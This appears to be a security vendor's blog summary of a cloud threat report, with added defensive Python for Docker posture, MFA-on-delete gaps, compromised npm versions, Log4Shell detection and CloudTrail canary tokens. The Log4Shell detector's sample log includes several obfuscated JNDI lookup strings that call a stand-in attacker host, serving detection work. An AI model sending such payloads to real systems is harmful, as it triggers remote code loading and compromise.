Security in the cloud continues to prove a challenge for organizations around the world.
Threat actors are refining their techniques to gain illicit access to cloud data and resources, and they never miss an opportunity to cash in, whether by taking advantage of common cloud configuration mistakes, targeting software supply chains, or adapting malware to evade detection. However, with cloud-based versions of tried-and-true defensive techniques like canary tokens and honeypots, defenders can use the power of the cloud to level the playing field. We have written up our discoveries in our bi-annual Cloud Threat Report Vol. 3, which is available here.
Cloud Security Posture
Docker APIs continue to be an enticing and abundant target for adversaries. Attackers compromise exposed Docker sockets and deploy malicious container images, some of which have been pulled and run by thousands of unsuspecting users, ultimately leading to cryptomining infections.
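The two exposures described above are straightforward to check for from the host. The following is an added example (not Lacework's tooling) that evaluates a daemon.json for an API listener reachable over plain TCP and walks `docker inspect` output for containers that run privileged, bind-mount the host's Docker socket, or run an image that is not pinned by digest. Field names follow the real daemon.json and `docker inspect` formats; the daemon configuration, container records and the placeholder image digest are constructed sample data.

```python
"""Posture checks for exposed Docker APIs and risky containers.

Added example, not Lacework's tooling.  Inputs mirror /etc/docker/daemon.json
and the HostConfig/Config/Mounts sections of `docker inspect`; the sample
data at the bottom is constructed."""
import json
from typing import Dict, List

DOCKER_SOCKET = "/var/run/docker.sock"


def daemon_findings(daemon_json: str) -> List[str]:
    """Flag a Docker API reachable over plain TCP or bound to every interface."""
    cfg = json.loads(daemon_json)
    tls = bool(cfg.get("tlsverify", False))
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners stay local to the host
        if not tls:
            findings.append(f"API listens on {host} without tlsverify")
        elif host[len("tcp://"):].startswith(("0.0.0.0", "[::]")):
            findings.append(f"API listens on all interfaces at {host}")
    return findings


def container_findings(containers: List[Dict]) -> Dict[str, List[str]]:
    """Per-container findings keyed by container name (empty dict means clean)."""
    report: Dict[str, List[str]] = {}
    for c in containers:
        name = c.get("Name", "?").lstrip("/")
        host_cfg = c.get("HostConfig") or {}
        problems = []
        if host_cfg.get("Privileged"):
            problems.append("runs privileged")
        # The socket can appear in the legacy Binds list or in Mounts; report it once.
        bind_srcs = [b.split(":")[0] for b in host_cfg.get("Binds") or []]
        mount_srcs = [m.get("Source") for m in c.get("Mounts") or []]
        if DOCKER_SOCKET in bind_srcs or DOCKER_SOCKET in mount_srcs:
            problems.append("mounts the host Docker socket")
        if host_cfg.get("PidMode") == "host":
            problems.append("shares the host PID namespace")
        image = (c.get("Config") or {}).get("Image", "")
        if "@sha256:" not in image:
            problems.append(f"image '{image}' is not pinned by digest")
        if problems:
            report[name] = problems
    return report


# Constructed sample data.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
SAMPLE_CONTAINERS = [
    {
        "Name": "/web",
        "Config": {"Image": "nginx@sha256:" + "0" * 64},  # placeholder digest
        "HostConfig": {"Privileged": False, "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
        "Mounts": [],
    },
    {
        "Name": "/agent",
        "Config": {"Image": "docker.io/example/agent:latest"},
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
            "PidMode": "host",
        },
        "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                    "Destination": "/var/run/docker.sock"}],
    },
]

if __name__ == "__main__":
    for finding in daemon_findings(SAMPLE_DAEMON_JSON):
        print("daemon:", finding)
    for cname, probs in container_findings(SAMPLE_CONTAINERS).items():
        print(f"{cname}: " + "; ".join(probs))
```

On a live host, feed `daemon_findings` the contents of /etc/docker/daemon.json and `container_findings` the JSON array from `docker inspect $(docker ps -q)`. A container that mounts the Docker socket is root on the host in all but name, so that finding alone warrants the same response as a privileged container.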
Cloud security posture management is one of the most important aspects of cloud security, yet it remains a hard problem to solve. Lacework Labs found that 72% of environments contain insecure configurations, and that half of all cloud infrastructure does not require multifactor authentication (MFA) for delete operations. Access to compromised cloud assets is also more attainable than ever thanks to the proliferation of cloud access brokers.
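The "no MFA for delete operations" finding is one a practitioner can test for in their own account. The following is an added example (not Lacework's tooling) that assumes the finding maps to two concrete AWS controls: S3 buckets without MFA Delete, and IAM policies that allow destructive actions (Delete*, Terminate*, or wildcards) without an aws:MultiFactorAuthPresent condition. Input shapes follow boto3's get_bucket_versioning() response and the IAM policy document format; the bucket states and policies are constructed.

```python
"""Two checks for delete operations that do not require MFA.

Added example, not Lacework's tooling.  Assumes the report's finding maps
to (a) S3 MFA Delete and (b) IAM Allow statements on destructive actions
that lack an aws:MultiFactorAuthPresent condition.  All sample data is
constructed."""
from typing import Dict, List

DESTRUCTIVE_VERBS = ("Delete", "Terminate")
MFA_CONDITION_KEY = "aws:multifactorauthpresent"  # IAM condition keys are case-insensitive


def bucket_mfa_delete_gaps(versioning: Dict[str, Dict]) -> Dict[str, str]:
    """Map bucket name -> reason for every bucket where MFA Delete is not active."""
    gaps = {}
    for bucket, cfg in versioning.items():
        # A bucket whose versioning was never configured returns no Status key.
        if cfg.get("Status") != "Enabled":
            gaps[bucket] = "versioning not enabled (MFA Delete requires versioning)"
        elif cfg.get("MFADelete") != "Enabled":
            gaps[bucket] = "MFA Delete disabled"
    return gaps


def _as_list(value) -> list:
    return value if isinstance(value, list) else [value]


def _is_destructive(action: str) -> bool:
    if action == "*":
        return True
    _, _, verb = action.partition(":")
    return verb == "*" or verb.startswith(DESTRUCTIVE_VERBS)


def _conditions_on_mfa(stmt: Dict) -> bool:
    for keys in (stmt.get("Condition") or {}).values():
        if any(k.lower() == MFA_CONDITION_KEY for k in keys):
            return True
    return False


def policy_delete_without_mfa(policy: Dict) -> List[str]:
    """Return the destructive actions this policy allows without an MFA condition.

    AWS's documented pattern of a blanket Deny (Action "*" or a NotAction
    list) when MFA is absent is honoured: if one is present, every Allow in
    the policy is treated as MFA-gated."""
    stmts = _as_list(policy.get("Statement", []))
    blanket_mfa_deny = any(
        s.get("Effect") == "Deny" and _conditions_on_mfa(s)
        and ("NotAction" in s or "*" in _as_list(s.get("Action", [])))
        for s in stmts
    )
    if blanket_mfa_deny:
        return []
    gaps: List[str] = []
    for s in stmts:
        if s.get("Effect") != "Allow" or _conditions_on_mfa(s):
            continue
        gaps.extend(a for a in _as_list(s.get("Action", [])) if _is_destructive(a))
    return gaps


# Constructed sample inputs.
SAMPLE_VERSIONING = {
    "audit-logs": {"Status": "Enabled", "MFADelete": "Enabled"},
    "db-backups": {"Status": "Enabled", "MFADelete": "Disabled"},
    "scratch": {},
}
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:DeleteBucket"], "Resource": "*"},
        {"Effect": "Allow", "Action": "ec2:TerminateInstances", "Resource": "*"},
    ],
}
SAMPLE_POLICY_GATED = {
    "Version": "2012-10-17",
    "Statement": SAMPLE_POLICY["Statement"] + [{
        "Effect": "Deny", "Action": "*", "Resource": "*",
        "Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": "false"}},
    }],
}
```

The policy check is deliberately narrow: it only inspects the statements it is given, so a user whose MFA requirement lives in a separate attached policy or a permissions boundary will show up as a gap until those are merged into the input. Treat its output as a list to review, not a verdict.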
The Business Model of Cloud Access Brokers
Expanding upon our cybercrime research from the last report, we dug deeper into the specifics regarding the business models of how initial access is sold, pricing structures, marketplaces, and their target market verticals.
A compromised AWS account sells for roughly $40 on average, while corporate accounts are offered for anywhere from $300 to upwards of $30,000. Although AWS is one of the most popular cloud service providers, AWS accounts made up only 16% of the hosting-account resale listings in our findings; Hostgator and Bluehost together account for half of all web hosting accounts listed for sale.
Vulnerabilities and Software Supply Chain
In October 2021, a ua-parser-js developer's npm account was compromised and used to push a malicious update to the package. On Linux systems, the malicious version downloaded and ran the open-source cryptocurrency miner XMRig. Confluence also suffered a significant vulnerability, CVE-2021-26084, which allowed unauthenticated attackers to execute arbitrary code on unpatched Confluence Server and Data Center instances.
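The first question after an incident like ua-parser-js is whether any build in the organization pulled the poisoned release, and the answer lives in lockfiles. The following is an added example (not from the ua-parser-js project or Lacework) that walks both npm lockfile layouts, the nested "dependencies" tree of lockfileVersion 1 and the flat "packages" map of versions 2 and 3, and reports every installed copy whose version is on a deny-list. The deny-list holds the three versions named in the public advisory for this incident (0.7.29, 0.8.0 and 1.0.0); confirm them against the advisory before relying on the list. The two sample lockfiles are constructed.

```python
"""Scan an npm lockfile for the compromised ua-parser-js releases.

Added example, not ua-parser-js's or Lacework's code.  Handles lockfile
v1 (nested "dependencies") and v2/v3 (flat "packages" keyed by path).
Deny-list versions are the ones named in the public advisory; the sample
lockfiles are constructed."""
import json
from typing import Dict, Iterator, List, Set, Tuple

COMPROMISED: Dict[str, Set[str]] = {"ua-parser-js": {"0.7.29", "0.8.0", "1.0.0"}}


def installed_packages(lock: Dict) -> Iterator[Tuple[str, str, str]]:
    """Yield (name, version, path) for every package recorded in the lockfile."""
    packages = lock.get("packages")
    if packages is not None:  # lockfileVersion 2 or 3: flat map keyed by install path
        for path, meta in packages.items():
            if not path:
                continue  # "" is the project itself
            name = path.rsplit("node_modules/", 1)[-1]  # keeps @scope/name intact
            yield name, meta.get("version", ""), path
        return

    def walk(deps: Dict, prefix: str) -> Iterator[Tuple[str, str, str]]:
        for name, meta in (deps or {}).items():
            path = f"{prefix}node_modules/{name}"
            yield name, meta.get("version", ""), path
            # v1 nests transitive copies under the parent's own node_modules
            yield from walk(meta.get("dependencies"), path + "/")

    yield from walk(lock.get("dependencies"), "")


def find_compromised(lock_text: str,
                     denylist: Dict[str, Set[str]] = COMPROMISED) -> List[Tuple[str, str, str]]:
    """Return (name, version, path) for each installed copy on the deny-list."""
    lock = json.loads(lock_text)
    return [(n, v, p) for n, v, p in installed_packages(lock)
            if v in denylist.get(n, set())]


# Constructed sample lockfiles.
SAMPLE_LOCK_V2 = json.dumps({
    "lockfileVersion": 2,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/express": {"version": "4.17.1"},
        "node_modules/express/node_modules/ua-parser-js": {"version": "0.7.28"},
        "node_modules/ua-parser-js": {"version": "0.7.29"},
    },
})
SAMPLE_LOCK_V1 = json.dumps({
    "lockfileVersion": 1,
    "dependencies": {
        "express": {"version": "4.17.1",
                    "dependencies": {"ua-parser-js": {"version": "1.0.0"}}},
        "ua-parser-js": {"version": "0.7.28"},
    },
})

if __name__ == "__main__":
    for lock in (SAMPLE_LOCK_V2, SAMPLE_LOCK_V1):
        for name, version, path in find_compromised(lock):
            print(f"{name}@{version} installed at {path}")
```

Run it over every package-lock.json in source control and in CI caches, not just the ones developers remember; the nested copy under another dependency is exactly the one a manual `npm ls` skims past.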
However, these issues pale in comparison to the vulnerabilities surrounding Log4j, which pushed this widely used Java logging library to the forefront of the technology industry as 2021 came to a close. The library is embedded in all types of software and touches nearly every industry vertical. Across our dataset, 31% of the malware infections we tracked during this period used Log4j exploitation as the initial infection vector.
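Because exploitation starts with a string the application logs, the initial access attempts are visible in web server logs, provided the detection undoes the obfuscation attackers used to dodge naive `${jndi:` matching. The following is an added example (not Lacework's detection logic) that percent-decodes each line, collapses nested lookups such as `${lower:j}`, `${upper:J}` and `${env:NOTEXIST:-j}` from the inside out, and then extracts the callback protocol and host. The four access-log lines, including the attacker address, are constructed.

```python
"""Detect Log4Shell-style JNDI lookups in web server log lines.

Added example, not Lacework's detection logic.  Undoes URL-encoding and
the nested-lookup obfuscation (${lower:..}, ${upper:..}, ${x:-default})
seen in real payloads before matching.  The log lines are constructed."""
import re
from typing import List, Tuple
from urllib.parse import unquote

INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s]*)", re.IGNORECASE)


def _resolve(match: "re.Match") -> str:
    """Evaluate one innermost ${...} lookup the way Log4j's string substitution would."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:  # ${env:NOTEXIST:-j} and ${::-j} both evaluate to the default "j"
        return body.rpartition(":-")[2]
    return match.group(0)  # leave ${jndi:...} and anything unknown untouched


def normalize(text: str) -> str:
    """Decode percent-encoding (twice, for double-encoded payloads) and
    collapse nested lookups from the inside out until nothing changes."""
    for _ in range(2):
        text = unquote(text)
    while True:
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            return text
        text = new


def find_jndi(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, protocol, target) for every line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for proto, target in JNDI.findall(normalize(line)):
            hits.append((lineno, proto.lower(), target))
    return hits


# Constructed Apache-style access log: one benign request, then three attempts
# with increasing obfuscation (plain, lower: lookups, percent-encoded default-value trick).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 612 "-" "%24%7B%24%7Benv%3ANOTEXIST%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D"
"""

if __name__ == "__main__":
    for lineno, proto, target in find_jndi(SAMPLE_LOG):
        print(f"line {lineno}: {proto} callback to {target}")
```

The normalization step is the part worth keeping even if the regex changes: a detection that matches the raw bytes catches the first line of the sample and misses the other two, which is exactly the gap scanners exploited in the days after disclosure. A hit here is evidence of an attempt, not of a successful exploit; confirm by looking for outbound connections from the application host to the extracted target.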
Issues affecting the software supply chain continue to highlight the importance of a software bill of materials (SBOM), asset management, the ability to patch quickly, and a healthy skepticism toward novel activity observed within the environment. Understand what you have and where it resides, and baseline normal behavior so that subtle tradecraft stands out.
Linux Malware and the Cloud
Over the past six months, XMRig, Muhstik, and Mirai dominated the cloud, accounting for a combined 74% of the malware infections we observed.
Aside from the usual suspects, Lacework Labs found that the PYSA ransomware group had begun modifying its ChaChi malware to target Linux, which is notable given that the group had primarily focused on Windows. This variant is an open-source, Golang-based RAT that uses DNS tunneling for command and control.
The operators behind HCRootkit (also known as Susteru) have been hard at work improving their malware and delivery process. The latest Linux variant evaded most endpoint security software and provided a seamless, capable backdoor into affected hosts.
Proactive Defense and Intelligence
In addition to tracking adversaries, the Labs team focused on vulnerability discovery and process improvements to strengthen the collective resilience of cloud infrastructure. This research shows how to leverage canary tokens within AWS to detect the use of compromised cloud credentials. Honeypots in general are a valuable addition to any organization's defenses, but they are often challenging to create and maintain. For this reason, Labs examined using a Docker registry with constraints to safely deploy real application code inside honeypots and to streamline honeypot creation, deployment, and monitoring.
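An AWS canary token in its simplest form is an IAM access key that is planted where an intruder would find it and never used legitimately, so any CloudTrail record bearing that key is an alert. The following is an added example (not Lacework's implementation) that matches CloudTrail log-file records against a list of planted key IDs and canary user ARNs and summarizes the results by source address. Field names follow the CloudTrail record format; the key IDs are AWS's documented placeholder values, and the account ID, ARNs and events are constructed.

```python
"""Match CloudTrail records against a list of AWS canary credentials.

Added example, not Lacework's implementation.  Field names follow the
CloudTrail record format.  Key IDs are AWS's documented placeholders; the
account ID, ARNs and events are constructed."""
import json
from typing import Dict, List

# Canary access key ID -> where it was planted (constructed).
CANARY_KEYS = {"AKIAIOSFODNN7EXAMPLE": "backup script on web-01"}
# Canary IAM users, matched by ARN in case the key was rotated (constructed).
CANARY_ARNS = {"arn:aws:iam::123456789012:user/backup-svc"}


def canary_alerts(trail_json: str, keys=CANARY_KEYS, arns=CANARY_ARNS) -> List[Dict]:
    """Return one alert per CloudTrail record that used a canary identity.

    Records are checked regardless of errorCode: a canary with zero
    permissions still produces AccessDenied events, and that is the signal."""
    records = json.loads(trail_json).get("Records", [])
    alerts = []
    for rec in records:
        ident = rec.get("userIdentity") or {}
        key_id = ident.get("accessKeyId", "")
        arn = ident.get("arn", "")
        planted = keys.get(key_id)
        if planted is None and arn not in arns:
            continue
        alerts.append({
            "eventTime": rec.get("eventTime"),
            "eventName": rec.get("eventName"),
            "eventSource": rec.get("eventSource"),
            "sourceIPAddress": rec.get("sourceIPAddress"),
            "userAgent": rec.get("userAgent"),
            "errorCode": rec.get("errorCode"),
            "accessKeyId": key_id,
            "planted_at": planted or "(matched by ARN)",
        })
    return alerts


def attacker_sources(alerts: List[Dict]) -> Dict[str, int]:
    """Count alerts per source IP, the first pivot an incident responder wants."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[a["sourceIPAddress"]] = counts.get(a["sourceIPAddress"], 0) + 1
    return counts


# Constructed CloudTrail log file: one legitimate call, then two calls with the canary key.
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventTime": "2022-01-10T08:02:11Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "sourceIPAddress": "10.20.0.4", "userAgent": "aws-cli/2.4.6",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice",
                      "accessKeyId": "AKIAI44QH8DHBEXAMPLE"}},
    {"eventTime": "2022-01-10T09:17:40Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "sourceIPAddress": "203.0.113.5",
     "userAgent": "aws-cli/1.22.0",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/backup-svc",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
    {"eventTime": "2022-01-10T09:17:52Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "sourceIPAddress": "203.0.113.5", "userAgent": "aws-cli/1.22.0",
     "errorCode": "AccessDenied",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/backup-svc",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
]})

if __name__ == "__main__":
    found = canary_alerts(SAMPLE_TRAIL)
    for a in found:
        print(f"{a['eventTime']} {a['sourceIPAddress']} {a['eventName']} "
              f"({a['errorCode'] or 'ok'}) key planted in: {a['planted_at']}")
    print("sources:", attacker_sources(found))
```

Two caveats when deploying this for real. The canary user needs no permissions at all, because sts:GetCallerIdentity succeeds for any valid key and is the first call most tooling makes; giving it permissions only turns the decoy into a liability. And CloudTrail log-file delivery lags the API call, so a batch job over S3-delivered files tells you a key was used, not that the intruder is still at the keyboard; wire the same match into a near-real-time event feed if response time matters.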
Lastly, the Labs team discovered and responsibly disclosed a privilege escalation vulnerability within Automox’s Windows patch management software. This vulnerability is assigned CVE-2021-43326 and has been mitigated in the latest version of their agent.
To learn about these findings and more, check out the full Lacework 2022 Cloud Threat Report Volume 3.